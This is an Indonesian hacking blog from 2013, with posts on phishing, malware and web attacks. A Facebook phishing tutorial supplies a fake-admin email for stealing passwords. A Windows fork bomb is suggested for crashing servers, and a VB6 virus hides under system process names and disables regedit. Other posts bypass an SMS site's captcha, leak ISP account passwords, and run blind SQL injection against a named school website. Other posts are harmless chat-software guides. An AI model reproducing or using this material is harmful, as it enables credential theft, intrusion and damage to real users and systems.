Recent Comments

FBS FOREX

Forex Broker Untuk Pemula

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Space For Ads

Space For Ads

Jumat, 22 November 2013

Base 64 Encoder/Decoder Script

 
 hari Ini saya mau share cara bikin enkripsi sendiri.. monggo di simak..
yg males scripting lgs donlot di sini aja broo









<?php //*********************************************************************************************
//TITLE : Base64 Encoder / Decoder
//*********************************************************************************************
 
echo"<title>Base 64 Encode / Decode</title>";
echo
"<div align=center>Base 64 Encode / Decode";
    
$Crutstripslashes($_POST['c0de']);
        if (
$Crut == "")
        {
       
$Crut $_GET['c0de'];
        }
 
    
$action $_POST['action'];
    if (
$action == "")
     {
    
$action $_GET['action'];
    if (
$action == "encode"){
              
$action "enc0de";
              }
              elseif (
$action == "decode")
              {
              
$action "dec0de";
              }
        }
     
    switch(
$action){
    case 
"enc0de":
           
$output base64_encode($Crut);
               if(!
$output){
               echo 
'Ada yang salah Crut!!!';
               }
     
    echo
"<center><table width='380'><td>";
    echo 
"<p> Input: " $Crut "</p>";
    echo 
"<p> Output (Base64): " $output ."</p>";
    echo 
"<p><a href='javascript:history.back(0);'> << Back </a></p>";
    break;
     
    case 
"dec0de":
    
$output base64_decode($Crut);
    if(!
$output){
    echo 
'Ada yang salah Crut!!!';
    exit;
    }
     
    echo
"<center><table width='380'><td>";
    echo 
"<p> Input (Base64) : " $Crut "</p>";
    echo 
"<p> Output : " $output ."</p>";
    echo 
"<p><a href='javascript:history.back(0);'> << Back </a></p>";
    break;
     
    default: echo 
'<form id="form1" name="form1" method="post" action="?encode/decode">
                <p>
                   <textarea name="c0de" id="c0de" rows=8 cols=40 ></textarea>
                </p>
              
              <p>Pilih yang mau di cari</p>
              
              <p><input type=radio name="action" id="action" value="enc0de">Encode</p>
              <p><input type=radio name="action" id="action" value="dec0de">Decode</p>
     
            <input type="submit" class = "button" name="submit" id="submit" onClick="
            if(c0de.value==\'\'){alert(\'mana teksnya crut???\'); return false;}" value="Submit" />
            <input type="reset" name="reset" class="button" value="Reset"/>
     
        </p>
      </form>'
;
      
    break;
    }
    
?>

Kamis, 21 November 2013

cara membuat fake login..

berjumpa lagi dengan sayaaa, kali ini saya akan membuat tutorial atau langkah-langkah..
bagaimana cara memebuat fake login/halaman palsu.. tentunyaa teman teman semua udah tau apa itu fake login.. bagi yang belum tau apa itu fake login, monggo di gogling..

nah langsung sajaaa..
langkah pertama:....
1. terlebih dahulu kita buat accound dengan mendaftar di webhosting gratisan yang mendukung/support PHP.. seperti bytehost, atau webhosting lainnyaa..

2. Ekstrak file code.rar dapat di sedot di  sini kemudian simpan atau upload di suatu direktori di webhosting yang telah kita daftar, misal nya http://NamaKita.bytehost.com/facebook/.. di dalam file code.rar berisi file-file antara lain: terdapat 3 file tersebut yaitu: index.html, logs.php dan logs.txt

3. Buatlah email palsu dengan menyamar sebagagi admin facebook tujuannya agar si target/korban yang kita harapkan percaya.. contohnya : admin_facebook@yahoo .com/admin.facebook@gmail .com/ admin.fb@plasa.com

4. Buat isi pesan dengan nama scriptisiemailpalsu. doc


SCRIPT ISI EMAIL PALSU

Keizen mengajak Anda anda berteman di Facebook. Kami perlu memastikan kepada Anda bahwa Anda memang mengenal  Keizen agar Anda bisa berteman di Facebook.

Untuk mengonfirmasi permintaan pertemanan ini, ikuti tautan di bawah ini:
http://www.facebook.com/n/?reqs.php&mid=883451G4a3b0e7eG88f1e5G2 

Terima kasih,
Tim Facebook

___
Pesan ini merujuk ke alamat_email_palsu@gmail.com  Ingin mengatur email apa saja yang Anda terima dari Facebook? Kunjungi:
http://www.facebook.com/editaccount.php?notifications&md=ZnJpZW5kO2Zyb209MTI1Mjg0ODc5Njt0bz0xMjQ1Mzg0MzE4&mid=883451G4a3b0e7eG88f1e5G2 
Kantor Facebook beralamat di 1601 S. California Ave., Palo Alto, CA 94304.

lto, CA 94304.
5. Buka isi file tersebut. Lalu ganti nama keizen ganti dengan nama ente dan ganti alamat_email_anda@gm ail.com dengan alamat palsu entee..

6. Lalu pada URL : http://www.facebook.com/n/?reqs.php&...b0e7eG88f1e5G2 ganti dengan URL halaman fake login yang telah kita buat tadi. contoh http://keizen/fileave.com/index/html

7. Setelah semua sudah kita persiapkan, segera kirim isi pesan tersebut ke alamat email si korban. Maka alamat email + password si korban akan datangan dengan sendiri nya ke email palsu yng kita buat tadii..

adapun beberapa cara yang lain, dan lain waktu nanti akan sayaaa bahas lagii..
karena sayaa masih ada tanggungan mengerjakan PR jadi sampe sekian dluu, nnt kita sambung lagii..

Rabu, 20 November 2013

Bikin hang windows hanya dengan 5 karakter (just 5 bytes of file)


Maaf kalo ini repost saya pun juga lupa kalo saya pernah baca ini dimana intinya LUPA..
Setahu saya ini merupakan  virus yang sedikit simple tapi cukup mematikan,.. :D

okee, langsung sajaaa..
Code:
%0|%0

ketik code tersebut di notepad dengan nama terserah anda.bat (harus menggunakan ekstensi .bat) terus kalo yang berani silahkan di coba.. Saya sendiri sih pernah coba dan komputer/laptop anda akan bawel dengan muncul nya memory peringatan 0x? yang error setiap saat, akibat selanjut nya saya sendiri juga kurang tahuu,.. :))


untuk pengembangannya silahkan digabung sama coding VB, C, Java, Perl, PHP, dan lain2 .. tentunya .BAT juga ..
buat yang hobi ngancurin server orang .. kalo nemu server IIS/windows yang udah ditanemin shell coba aja pake ini .. mungkin si server lgsng !CRASH! hehehehe





Code: 
import java.io.*;
public class ffaaddiill {
   static String m = "cmd /C msg * shinobi_master_was_here";
   public static void main(String []args)throws IOException {
      ffaaddiill zombie = new ffaaddiill();
      Runtime.getRuntime().exec(zombie.m);
   }
}


buat yg males nulis program nya.. monggo lgs sedot aja.. 

Kamis, 07 November 2013

Bikin bot untuk sms gratis


Hello (Q)uestion, ketemu lagi sama (A)nswer... Bot-mu kemarin gimana?
(Q) : udah kap, tapi kayaknya captcha yang dipake situs penyedia layanan sms gratis itu udah diganti. Denger2 gosipnya mereka pake teknik encrypt 512 bit yang dipake NASA buat menghitung jumlah bintang dilangit. Pokoknya susah banget deh kalo pengen bikin generator kode sendiri...
(Q) : coba liat ja penggalan source code situs dibawah ini, variabel "mathguard_code" nya itu loh.. bikin bulu kuduk berdiri... kodenya aneh.

jawab ini : 1 + 4 =
<input type='input' name='mathguard_answ er' size='2'/><input type='hidden' name='mathguard_code ' value='d3291c2554192 b5d7729a1730c92f3e1' />


d3291c2554192b5d7729 a1730c92f3e1 <--- kode aneh inilah yang dimaksud (Q), padahal kode ini tetep MD5 kayak yang kemarin. dasar dodolz...
// Bab II
sepenggal cerita aneh diatas merupakan sebuah kasus lain dari cerita sebelumnya "http://explorecrew.org/portal.php?page=read &ID=223#Mengirim%20S MS%20gratis%20menggu nakan%20bot%20[cara%201]" seandainya kita tidak tahu pola variabel yang ditampilkan mathguard_code secara acak, sehingga kita tidak bisa membuat sendiri generator untuk men-generate kode palsu.
(A) : hei (Q), cara kemarin dah gak berlaku lagi ya? trus itu dapat bisa dapat kode "mathguard_code" dari mana?
(Q) : aku buka webnya, trus liat source code nya, dapet deh kode aneh itu.
(A) : nah loh, berarti kan udah dapat kodenya tuh, berarti gak perlu di generate sendiri dong?
(Q) : iya ya... maksudnya?
(A) : gini... Lihat skema munculnya kode aneh itu dalam proses loading sebuah halaman web...
1. Browsing
2. Halaman Web Terbuka (didalamnya terdapat kode aneh)
3. ketik sms
4. kirim sms (beserta kode aneh didalam halaman web ini)
5. Terkirim
Jadi sebenarnya kode aneh diatas tak perlu kita generate lagi, tapi kita ambil saja dari Halaman web yang sedang dibuka, lalu kirimkan kembali kode aneh tersebut. Tapi karena bot tidak membuka halaman web, maka halaman web yang kita browsing tersebut disimpan kedalam suatu variabel, lalu skemanya jadi seperti ini:
1. Browsing
2. Halaman web YANG terbuka disimpan kedalam variabel $html (yang didalamnya terdapat kode aneh)
3. Ambil kode aneh tersebut (SAJA) dari variabel $html
4. Lalu kirimkan kembali kode aneh tersebut bersama dengan variabel-variabel lain seperti variabl $no_hp dan variabel $pesan bersama dengan variabel $kode_aneh menggunakan cara-1 seperti pada artikel sebelumnya.
dan tentu saja dengan cara seperti ini, berarti kita melakukan proses browsing ke website penyedia layanan sms sebanyak 2 kali, yakni browsing pertama untuk mendapatkan "kode_aneh" dan browsing kedua untuk mengirimkan kembali "SMS" dengan "kode_aneh" untuk validasi.
Ok. go to code...

<?php
 $smsGateway 
"http://sms-online.web.id/kirim-sms.php";
 function 
sendText($no,$text) {
 global 
$smsGateway;
 
// Browsing Pertama untuk mendapatkan kode_aneh ($mathguard_code)
 
$ch curl_init();
 
curl_setopt($ch,CURLOPT_URL,$smsGateway);
 
curl_setopt($ch,CURLOPT_RETURNTRANSFERtrue);
 
curl_setopt($ch,CURLOPT_FOLLOWLOCATIONtrue);
 
 
$html curl_exec($ch); // hasil browsing disimpan didalam variabel $html
 
curl_close($ch);
 
 
// Proses pencarian validasi penjumlahan sederhana
 
$findMathCalc explode(base64_decode("amF3YWIgaW5pIDog"),$html);
 
$getVar explode(" ",$findMathCalc[1]);
 
$a $getVar[0];
 
$b $getVar[2];
 
$ans $a $b;
 
 
// Proses pencarian kode_aneh dari variabel $html
 
$findMathguard explode("mathguard_code",$html);
 
$getHash explode("'",$findMathguard[1]);
 
$hashMD5 $getHash[2]; 
 
 
// Browsing Kedua, untuk mengirimkan SMS setelah kode_aneh ditemukan
 
$ch curl_init();
 
curl_setopt($ch,CURLOPT_URL,$smsGateway); 
 
curl_setopt($ch,CURLOPT_RETURNTRANSFERtrue); 
 
curl_setopt($ch,CURLOPT_POST1); 
 
curl_setopt($ch,CURLOPT_POSTFIELDS'Phonenumbers=$no&mathguard_answer=$ans&mathguard_code=$hashMD5&TOMBOL=KIRIM&Text=$text'); 
 
$Output curl_exec($ch);
 
curl_close($ch); 
 }
 
?> 
 




Rabu, 06 November 2013

Tips dan Trik Koneksi Speedy

logo speedy
persiapan :
1. account speedy dan passwordnya
2. mental doang





caranya :
1. masuk ke http://store.telkomspeedy.com
2. pilih produk yang ingin di order .
3. tekan tombol "berlangganan konten ini" .
4. masukin account speedy , password speedy , email dan kode keamanan .
5. menyetujui TOS layanan .
6. terus klik tombol "pesan" .
7. setelah itu cek email kalian .

untuk yang mau coba2 saya kasih nih account speedynya .

1. account number : 111707102282@telkom. net
password : 431092

2. account number : 111724100671@telkom. net
password : pncdyb17at

3. account number : 111717101385@telkom. net
password : 123456

4. account number : 111706100770@telkom. net
password : suharto

5. account number : 111801105041@telkom. net
password : jksfkc09oe

sekian tips dan trick dari saya . jika ada salah kata mohon maaf .

Selasa, 05 November 2013

Buat Metode Enkripsi Sendiri Yukk..


Ceritanya si Question [Q] beraksi lagi. Dia baru saja mendapat nilai yang parah dari hasil ujian Semesternya kali ini. Parahnya lagi, nilainya yang ancur itu ditampilkan disitus kampusnya yang tentu saja bisa dilihat oleh banyak orang (Cat.: Diseluruh Dunia <--- baca dengan adegan lambat).

Dengan berbekal sebuah mouse dan keyboard, mulailah dia menggerayangi situs kampusnya yang terkenal handal dengan securitynya. Beberapa menit kemudian, setelah melalui beberapa teknik hacking, si Question berhasil memasuki situs kampusnya (hanya beberapa menit? katanya situs handal???), dan mengantarkan dia pada sebuah Database yang berisi Username dan Password untuk bisa login dan tentu saja untuk "mengganti nilai". berikut beberapa username dan password yang

berhasil dia dapatkan dari situs kampusnya:

Username: Mahasiswa1
Password: MTIzNA==

dilihat dari bentuk enkripsi passwordnya, kayaknya neh pake encode Base64. "ah, gampang...". setelah di decode, hasil password=1234. Tapi setelah dipake buat login, ternyata gak bisa buat ganti nilai. karena emang statusnya cuma bisa login sebagai mahasiswa. yarp, dia beralih ke akun berikutnya.

Username: Mhs2
Password: 81dc9bdb52d04dc20036 dbd8313ed055

dilihat dari bentuk enkripsi passwordnya dan dilihat dari jumlah hurufnya, neh diencrypt pake MD5. "ah, masih gampang...". setelah pake Dictionary Attack, didapati hasil password=1234 (juga). setelah dipake buat login, ternyata gak bisa buat ganti nilai (juga). karena emang statusnya (juga) cuma sebagai mahasiswa. yarp, dia beralih (lagi) ke akun berikutnya.

dan beberapa Username lain, yang dienkripsi menggunakan metode2 enkripsi yang sudah ada mulai dari Caesar Chipper, ROT13, sha1, dll, berhasil dipecahkan si Question. Tapi tetep ja gak ada 1 akunpun yang bisa digunakan untuk login sebagai dosen untuk mengganti nilai. Padahal yang dia butuhkan hanyalah sebuah akun

salah satu dosen untuk bisa mengganti nilai. Yarp, harapan pun akhirnya datang juga, 1 akun terakhir:

Username: Sang Dosen
Password: ¬hgn@"oìjg

Setelah googling, dan mencari referensi semua metode enkripsi, password Sang Dosen tidak berhasil dipecahkan. Dan Si Question pun membanting Laptop Toshiba

Satellite E105 miliknya. TAMAT.

Cerita diatas hanya fiksi belaka. (ups..plakk!!!)

//Article Begin
Biasanya, untuk melindungi data kita, misalkan password, kita mengenkripsi data tersebut dengan metode enkripsi tertentu. Tentu saja hal ini menyulitkan seorang cracker untuk mendapatkan data password tersebut. Tapi hal ini bukan berarti tidak mungkin, karena telah banyak beredar tools2 yang berguna untuk mendecrypt sebuah data yang sudah diencrypt. Dengan metode apapun itu.

Kalo memang untuk metode encrypt yang umum sudah banyak tools untuk mendecrypt, kenapa kita tidak membuat sendiri saja metode encrypt sendiri yang tentu saja belum ada toolsnya diInternet??? Seperti password yang digunakan oleh Username Sang Dosen "¬hgn@"oìjg". ^_^

yarp, mari kita buat sendiri enkripsi ala Sang Dosen, dan kita namakan Yarp-Chipper v1.0 <--- hehe

function yarpChipper($str){
 $tblHex = "0123456789abcdef";
 $tblBin = "0000 0001 0010 0011 0100 0101 0110 0111 1000 1001 1010 1011 1100 1101 1110 1111";
 for($a=0;$a<strlen($str);$a++){
  $dechex .= dechex(ord(substr($str,$a,1)));   
 }
 for($b=0;$b<strlen($dechex);$b++){
  $hex = substr($dechex,$b,1);
  $hexIdx = strpos($tblHex,$hex);
  $output = substr($tblBin,$hexIdx*5,4);   
  $bin = strrev($output);     
  $binIdx = strpos($tblBin,$bin);    
  $hasil  .= substr($tblHex,$binIdx/5,1); 
 }  
 for($c=0;$c<strlen($hasil)/2;$c++){
  $hexRev = substr($hasil,$c*2,2);
  $code = chr(hexdec($code));
  return $code;
 }




 Code diatas akan mengubah sebuah string menjadi Nilai Decimal, kemudian diubah lagi menjadi Hexa, lalu diubah menjadi Biner, lalu membalik nilai Biner tersebut, kemudian kembalikan ke nilai Hexa, balik lagi ke Decimal, lalu kembalikan ke nilai String, dan berakhir dengan bentuk karakter yang berbeda. :p

<--- apa-apaan ini???

hehe..
Contoh:
sebuah string "Sang Dosen" jika kita encrypt menggunakan fungsi diatas, akan menjadi seperti ini:

Sang Dosen <--- Kata Asli
83971101033268111115 101110 <--- Ubah Menjadi Decimal
53616e6720446f73656e <--- Ubah Ke Hexa
01010011011000010110 11100110011100100000 01000100011011110111 00110110010101101110 <--- Ubah Ke Biner
10101100011010000110 01110110111001000000 00100010011011111110 11000110101001100111 <--- Membalik nilai Biner
ac68676e40226fec6a67 <--- Kembalikan ke nilai Hexa dari hasil pembalikkan Biner
¬hgn@"oìjg <--- dan yang terakhir adalah mengembalikan nilai Hexa menjadi string yang bisa dibaca layaknya sebuah kata biasa.

Tapi dengan membaca alur logika ini berdasarkan hasil outputnya, sebenarnya metode ini masih bisa dipecahkan. Jadi mari kita update Yarp-Chipper ini menjadi

versi 2.0 biar lebih komplek dan sedikit lebih menyulitkan seorang cracker. tapi To Be Continued dulu ya... hehe
Kalo temen2 bingung.. bisa lgs download aja script ny..biar temen2 tinggal edit2 sendiri.. monggo

Senin, 04 November 2013

Teknik dasar pembuatan virus dari vb6

kali ini aku kan mau share cara pembuatan virus pada vb6
kali nie aku ada 8 teknik dasar dalam pembuatan virus
tapi ini si peling simpel dari pada yang lain.

Tutor ini hanyalah merupakan suatu pembelajaran,
yangg berupa konsep dasar dalam pembuatan virus di visual basic
jadi pada dasarnya syntax dibawah ini
nantinya akan kalian kembangkan seprti apa yg kalian inginkan virusnya
ok langsung aja gan

Pertama, bikin form buat virus kamu pake Standart exe saja

1. menyembunyikan Form

Private Sub Form_Load()
App.TaskVisible = False
End Sub


2. Copy Diri Sendiri
Misalnya mau dikopiin ke direktori C:\Windows dengan nama winlogon.exe csrss.exe ato services.exe
biar prosesnya sulit di kill pake taskmanager, nama virus pake nama system pada windows

On Error Resume Next
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\winlogon.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\csrss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\services.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\smss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\lsass.exe”


3. Bikin Direktori ato folder
Misalnya bikin folder di windows direktori

On Error Resume Next
MkDir “C:\WINDOWS\virus”

4. Mengganti Atribut file
Bisa juga buat ngganti atribut folder

Attributes = 0 0 berarti normal
Attributes = 1 1 berarti read only
Attributes = 2 2 berarti hidden
Attributes = 3 3 berarti read only + hidden
Attributes = 4 4 berarti system
Attributes = 5 5 berarti system + read only
Attributes = 6 6 berarti system + hidden

Set sembunyi = CreateObject(”Scripting.FileSystemObject”)
On Error Resume Next
sembunyi.GetFile(”C:\WINDOWS\winlogon.exe”).Attrib utes = 2
sembunyi.GetFile(”C:\WINDOWS\csrss.exe”).Attribute s = 2
sembunyi.GetFile(”C:\WINDOWS\services.exe”).Attrib utes = 2
sembunyi.GetFile(”C:\WINDOWS\smss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\lsass.exe”).Attribute s = 2

tapi kalo folder pakenya
sembunyi.GetFolder(”C:\WINDOWS\”).Attributes = 2

5. Bikin Pesan Virus
Bikin pesen pake text file

On Error Resume Next
Set bikinpesen = CreateObject(”Scripting.FileSystemObject”)
Set isipesen = bikinpesen.Createtextfile(”C:\baca saya.txt “)
isipesen.writeline (”komputer kamu kena virus bodoh “)
isipesen.Close

6.Ngubah Registry
Misalnya mo disable regedit

On Error Resume Next
Set ubahreg = CreateObject(”WScript.Shell”)
ubahreg.regwrite “HKEY_CURRENT_USER\software\
microsoft\windows\currentversion\policies\system\
disableregistrytools”, 1, “REG_DWORD”

7.Menghapus Registry

Misalna mo ngehapus HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon

jadi nya seperti ini:
On Error Resume Next
Set hapusreg = CreateObject(”WScript.Shell”)
hapusreg.regdelete “HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon”

Segala Kerusakan  saya tidak bertanggung jawab.. saya cuma share.. :D

Minggu, 03 November 2013

Chat Facebook menggunakan Pidgin

Chatting di facebook tidak selalu harus buka browser lalu buka facebook lalu baru melakukan chat, hal ini tidak efisien karena dapat memperlambat kerja browser karena hidupnya script chat facebook. Solusi selain chat dengan menggunakan cara di atas adalah dengan menggunakan software semacam YM (yahoo messanger) tapi kali ini bukan YM melainkan software chat yang bernama pidgin, silahkan downolad lgs  ya.. software chat all in one ini memiliki banyak koneksi ke masing masing chat network, di antaranya:
  • AIM
  • Bonjour
  • Gadu-Gadu
  • Google Talk
  • Groupwise
  • ICQ
  • IRC
  • MSN
  • MySpaceIM
  • QQ
  • SILC
  • SIMPLE
  • Sametime
  • XMPP
  • Yahoo!
  • Zephyr




Sedangkan untuk chat facebook kita harus menambahkan plugin lagi, dapat di cari di google keywword "plugin pidgin facebook"
atau dapat juga langsung langsung di download plugin pidgin facebook nya di sini thanks, semoga bermanfaat..

Sabtu, 02 November 2013

Yahoo! Messenger di Linux dengan menggunakan Pidgin

Ada banyak program untuk aplikasi Yahoo! Messenger di Linux, seperti Kopete, Gyachoo / Gyach Enhanced, YM for Linux, dan Pidgin. Kopete dan YM for Linux tidak mendukung penggunaan Room List. Jika Anda ingin menggunakan fitur room list dari Yahoo! Messenger, pergunakanlah Gyachoo atau Pidgin.
Sekalipun Gyachoo mempunyai tampilan yang cukup mirip dengan YM!, sayangnya ada beberapa kendala room list di Gyachoo. Jadi pilihan terbaik saat ini untuk menggunakan room list YM di Linux adalah Pidgin.
Jika belum punya software ny bisa di download gratis di sini  cari untuk yg versi Linux ya temen2..

Berikut cara menggunakan Yahoo! Room List dengan Pidgin :
1. Klik icon Pidgin di Desktop atau buka menu Start > Internet > Instant Messaging > Pidgin.
2. Klik tombol Add untuk menambahkan id YM! Anda di Pidgin.
3. Pilih Yahoo! pada bagian Protocol.
4. Masukkan id YM! Anda di kotak Screen Name dan klik tombol Save.
5. Masukkan password id YM! dan kemudian klik OK.
6. Setelah masuk ke YM!, klik Menu > Tools > Room List.
7. Klik tombol Get List untuk mengambil daftar room yang ada.
8. Pilih Room yang ingin dimasuki dan klik tombol Join.
9. Klik link verifikasi yang ditampilkan.
9. Pidgin akan menjalankan browser dan Anda diharuskan memasukkan kode verifikasi yang terlihat di halaman web.
Penting :
Pastikan Anda sudah menentukan browser yang akan dipergunakan untuk membuka link verifikasi. Jika Anda mengklik link verifikasi dan tidak ada browser yang terbuka, berarti Anda belum menentukan browser yang akan dipergunakan Pidgin. Untuk melakukannya, cukup klik menu Tools > Preferences > Browser dan pilih browser yang tersedia dalam daftar.
11. Masukkan teks verifikasi yang muncul di browser dan klik tombol Submit.
12. Jika teks yang Anda masukkan benar, Pidginakan membawa Anda ke ruang yang dituju.

Baca lebih lengkap nya di sini
 

Jumat, 01 November 2013

Belajar Menjadi Programmer

Tidak ada kata yang tidak mungkin. Ada beberapa kunci agar kita sukses menjadi programmer online, tanpa kuliah:


1.1. Kuasai bahasa Inggris, paling tidak bisa membaca dokumen, kalau masih belum bisa belajar secara bertahap, gunakan kamus online, gunakan translate online seperti google translate, semua gratis dan dengan mudah anda dapatkan di internet.

1.2. Segera beli Komputer atau notebook, sebagai alat wajib yang harus dimiliki, kalau tidak ada duit jadi operator warnet yang pemiliknya baik hati.

1.3. Sambung dengan koneksi internet, baik lewat HP, atau ke Warnet, kabar bagus kalau anda punya notebook WIFI, anda bisa dapat akses gratis pake fasilitas HOTSPOT. yang tersebar di seluruh penjuru.

2. Pelajari Materi Pokok, atau mata kuliah pokok yaitu Belajar coding, mulai dari logika sederhana yaitu menampilkan kata “Hello Word”, baik untuk program dekstop mauapun untuk web programming.

3. Mulai praktek, jangan banyak terori, nanti gak kelar-kelar.

4. Saat ini ada 2 kelompok programming dari segi tampilan atau output yaitu Web Programming, seperti PHP, Java, JSP dan ASP. Dan desktop programming seperti C, Visual Basic, Delphi, Java desktop.

4.2. Pelajari sesuai target Kalau ingin buat website terprogram kuasai saja PHP. di internet materi ini tersedia melimpah ruah. Buat program sederhana dulu, dan semua ada contoh, ikuti dan coba praktekkan.

4.3. Untuk desktop gunakan Visual C, Visual Basic, Delphi, atau Java, saya anjurkan Visual basic atau delphi, tapi jika ingin jago kuasai C++.

5. Pelajari dan kuasai Database SQL, contoh Mysql, Oracle, Interbase, Microsoft SQL, Postgre SQL dan pulihan SQL lainnya. Yang populer Mysql dan Postgree terutama aplikasi web base.

6. Pelajari dan Kuasai jaringan Komputer dan Internet

7. Pelajari dan Kuasai Desain seperti photoshop, meskipun anda tidak suka.

8. Untuk mengusai minimal satu bidang dibutuhkan minimal 1 tahun, dan master 4 tahun, dan jika kita serius maka semakin lama semakin mantap, dan semakin banyak orang yang menawari anda.

9. Agar lebih PD kontrak atau kos di deket anak kuliah Jurusan IT

10. Kalau Ingin jadi Programer handal jangan lupa nanti pelajari: UML, ER, CRUD, DFD, Flowchart and Mind Map.

a.Ayo Raih Prestasi, meskipun anda tidak kuliah

b.Bagun komunitas online yang banyak tersedia di internet. c.Fokus pada satu tujuan, yakin bahwa kita bisa, tanpa harus kuliah. d. Praktek, praktek dan praktek, Coba, coba dan coba. Masihkan menyalahkan Pemerintah, Orang tua, keadaan, nasip, saya rasa saatnya menyalahkan diri sendiri, dimana peluang begitu banyak,kesempatan begitu terbuka tapi kita tidak melakukan apa apa. Ayo……semangat, kerja keras, kerja cerdas, kerja untuk masa depan yang gemilang, tanpa menjadi beban orang orang lain dan beban bagi diri sendiri...


sumber belajar JAVA  
sumber belajar WEB  

Variasi Tehnik Hacking Web

Terdapat beberapa cara untuk criminal dapat mengancam jaringan web. Berikut list beberapa aksi teknik hacking :

Reconnaissance
Dalam teknik ini, criminal dapat memperoleh informasi mengenai target system, termasuk username, password, parameter input, program atau bahasa script, tipe server, dan system operasi.

Probe
Dalam fase ini criminal mendeteksi kelemahan system SQL injection termasuk dalam teknik ini dan banyak digunakan untuk menemukan hal tersembunyi dan lubang keamanan yang ada.

Toehold
Criminal akan memproses fase ini ketika penyusup masuk ke dalam system, membangun koneksi, biasanya menyerang session, mencari informasi system dan mulai mengeksploitasi kelemahan keamanan.

Advancement
Fase ini criminal akan mencari konfigurasi error dan mengubah ke account user yang masih unprivileged menjadi priilege, atau bergerak dari normal user dengan sedikit izin akses menjadi administrator, dimana setelah itu criminal akan mendapatkan full akses untuk membuat, menghapus, memodifikasi, menerima atau memindahkan file dan informasi.

Stealth
Langkah stealth ini berupa penyamaran keberadaan penyusup yang sudah masuk ke system. Langkah tersebut dilakukan dengan mengakses dan memodifikasi log file untuk menghilangkan bukti yang dapat memberitahukan user mengenai serangan tersebut.

Listening Port
Dalam listening port tersebut, penyusup akan mengeset backdoor, yakni program jahat yang akan memastikan aktivitas selanjutnya tidak bisa dilakukan. Program itu dinamakan stealth, atau tool backdoor, atau sniffer. Selain itu, penyusup juga dapat memberikan informasi yang salah ketika user mengakses file dan memproses jaringan system, dengan tujuan untuk menyamarkan keberadaan user.

Takeover
Digunakan untuk memperluas control dari satu system ke system lain di jaringan yang sama. Penyusup dapat menggunakan sniffer untuk mendeteksi informasi di host lain, seperti username dan password. Step ini dapat digunakan untuk menemukan host computer yang belum terkena hack sehingga penyusup dapat mengakses host lain. Step ini umumnya dilakukan dengan bahasa pemrograman yang simpe dan dikontrol oleh programmer.

Smogar Bermanfaat..
Monggo yang lain di gogel aja karena saya jg nda mau hanya nulis di tangkep polisi nanti.. :D

Blind SQL

BLIND SQL INJECTION
 buat temen2 yg belum tau apa itu SQL-Injection bisa di baca2 dulu di sini.. monggoo


kembali lagi akh.. wkwkwkwk..

mari kita membahas tentang Blind SQL Injection..

Apa sich Blind SQL Injection tu?

Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...

disini GT memakai command :

mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter

lanjut..

ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..
kalau version 4..kita memakai blind,karena v4 tidak support query information_schema

kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw

lanjut...

Target: www.smanti.com (thx to bejamz udah ngasih target :)

1.PENGETESAN BUG

Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1


www.smanti.com/berita.php?id=5 and 1=0 <<<false

www.smanti.com/berita.php?id=5 and 1=1 <<<true

eh ternyata ada bug nya...

lanjut....

2.BLIND INJECT

Query yg dipakai: and mid(user(),1,1)=CHAR(65)

saya jelaskan sedikit deh..

mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut

sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...

lanjut..

mari kita masukkan

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)

ternyata hasilnya masih false (beritanya hilang)

berarti value yg kita masukkan salah..

tinggal tambah value na..jadi..

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) <<masih false juga..

dst sampe kita menemukan keadaan true(beritanya muncul kembali)

kebetulan ada di char(83)

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83)  <<akhirnya true..

cape?masih kuat?hahaha..trial n error...

lanjut..

kita tambain value na..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

adakah perbedaan nya?

yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..

gini nih..

1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)

dst.. sampe dpet yg true..

ternyata yg true ngumpet di value 77

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)


lanjutin trus langkah2na..

cari value k 3 user..

www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)

eh langsung ktemu..hehehe..

lanjut value k 4..

